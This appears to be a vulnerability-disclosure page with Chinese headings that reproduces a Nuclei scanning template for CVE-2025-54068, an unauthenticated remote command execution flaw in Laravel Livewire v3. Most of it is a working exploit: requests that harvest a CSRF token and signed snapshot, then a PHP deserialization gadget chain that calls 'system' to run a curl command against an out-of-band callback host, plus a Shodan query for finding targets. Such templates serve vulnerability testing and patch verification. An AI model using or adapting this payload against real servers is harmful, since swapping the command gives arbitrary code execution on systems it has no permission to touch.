漏洞描述
Livewire v3 (Laravel) contains a vulnerability in its component hydration/update mechanism that can be exploited to reach remote command execution (RCE) without authentication under certain conditions.
CVE-2025-54068: Laravel Livewire v3 - Remote Command Execution
PoC代码[已公开]
id: CVE-2025-54068
info:
name: Laravel Livewire v3 - Remote Command Execution
author: flame-11
severity: critical
description: |
Livewire v3 (Laravel) contains a vulnerability in its component hydration/update mechanism that can be exploited to reach remote command execution (RCE) without authentication under certain conditions.
impact: |
An unauthenticated attacker may execute arbitrary commands in the web server context.
remediation: |
Upgrade livewire/livewire to a patched version (>= 3.6.4).
reference:
- https://github.com/livewire/livewire/security/advisories/GHSA-29cq-5w36-x7w3
- https://github.com/synacktiv/Livepyre
- https://www.synacktiv.com/en/publications/livewire-remote-command-execution-through-unmarshaling
- https://www.synacktiv.com/sites/default/files/2025-09/slides-livewire-nullcon2025.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2025-54068
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.8
cve-id: CVE-2025-54068
cwe-id: CWE-502
cpe: cpe:2.3:a:laravel:livewire:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
shodan-query: html:"wire:id"
tags: cve,cve2025,laravel,livewire,rce,deserialization,oast,intrusive
flow: http(1) && http(2) && http(3)
variables:
marker: "{{randstr}}"
http:
- method: GET
path:
- "{{BaseURL}}/"
matchers:
- type: dsl
internal: true
dsl:
- "status_code == 200"
- "contains(body, 'wire:snapshot=')"
- "contains(body, 'data-update-uri=')"
- "contains(body, 'data-csrf=') || contains(body, 'csrf-token')"
condition: and
extractors:
- type: regex
name: csrf_token
part: body
group: 1
internal: true
regex:
- 'data-csrf="([^"]+)"'
- '"csrf"\s*:\s*"([^"]+)"'
- '<meta name="csrf-token"\s+content="([^"]+)"'
- type: regex
name: update_uri
part: body
group: 1
internal: true
regex:
- 'data-update-uri="([^"]+)"'
- '"uri"\s*:\s*"([^"]+)"'
- type: regex
name: snapshot_attr
part: body
group: 1
internal: true
regex:
- 'wire:snapshot="([^"]+)"'
- type: regex
name: param_name
part: body
group: 1
internal: true
regex:
- 'wire:snapshot="[^"]*(?:"data":\{"|\"data\":\{\"?)([A-Za-z0-9_]+)'
- method: POST
path:
- "{{BaseURL}}/{{trim_prefix(update_uri,'/')}}"
headers:
Content-Type: application/json
body: |
{
"_token": "{{csrf_token}}",
"components": [
{
"snapshot": "{{replace(replace(html_unescape(snapshot_attr),'\\','\\\\'),'\"','\\\"')}}",
"updates": { "{{param_name}}": [] },
"calls": []
}
]
}
matchers:
- type: dsl
internal: true
dsl:
- "status_code == 200"
- "contains(content_type, 'application/json')"
- "contains(body, 'snapshot')"
condition: and
extractors:
- type: json
name: snapshot_signed
part: body
internal: true
json:
- ".components[0].snapshot"
- method: POST
path:
- "{{BaseURL}}/{{trim_prefix(update_uri,'/')}}"
headers:
Content-Type: application/json
body: |
{
"_token": "{{csrf_token}}",
"components": [
{
"snapshot": "{{replace(replace(snapshot_signed,'\\','\\\\'),'\"','\\\"')}}",
"updates": {
"{{param_name}}": [
1,
[
{
"a": [
{
"__toString": "phpversion",
"close": [
[
[
{
"chained": [
"O:38:\"Illuminate\\Broadcasting\\BroadcastEvent\":4:{s:5:\"dummy\";O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":2:{s:9:\"\u0000*\u0000events\";O:31:\"Illuminate\\Validation\\Validator\":1:{s:10:\"extensions\";a:1:{s:0:\"\";s:6:\"system\";}}s:8:\"\u0000*\u0000event\";s:{{len('curl -m 4 -fsS http://{{interactsh-url}}/?q={{marker}}')}}:\"curl -m 4 -fsS http://{{interactsh-url}}/?q={{marker}}\";}s:10:\"connection\";N;s:5:\"queue\";N;s:5:\"event\";O:37:\"Illuminate\\Notifications\\Notification\":0:{}}"
]
},
{
"s": "form",
"class": "Illuminate\\Broadcasting\\BroadcastEvent"
}
],
"dispatchNextJobInChain"
],
{
"s": "clctn",
"class": "Laravel\\SerializableClosure\\Serializers\\Signed"
}
]
},
{
"s": "clctn",
"class": "GuzzleHttp\\Psr7\\FnStream"
}
],
"b": [
{
"__toString": [
[
[
null,
{
"s": "mdl",
"class": "Laravel\\Prompts\\Terminal"
}
],
"exit"
],
{
"s": "clctn",
"class": "Laravel\\SerializableClosure\\Serializers\\Signed"
}
]
},
{
"s": "clctn",
"class": "GuzzleHttp\\Psr7\\FnStream"
}
]
},
{
"class": "League\\Flysystem\\UrlGeneration\\ShardedPrefixPublicUrlGenerator",
"s": "clctn"
}
]
]
},
"calls": []
}
]
}
matchers:
- type: word
part: interactsh_request
words:
- "?q={{marker}}"
# digest: 4a0a0047304502205156bc6840a825de8a36ca61a074cb8e30e425cbdfc28f4e814c7c5a9676ef760221008621251a000249ec5c1caa50a64e9d31d637587d81eba2eac434b93f01f0d312:922c64590222798bb761d5b6d8e72950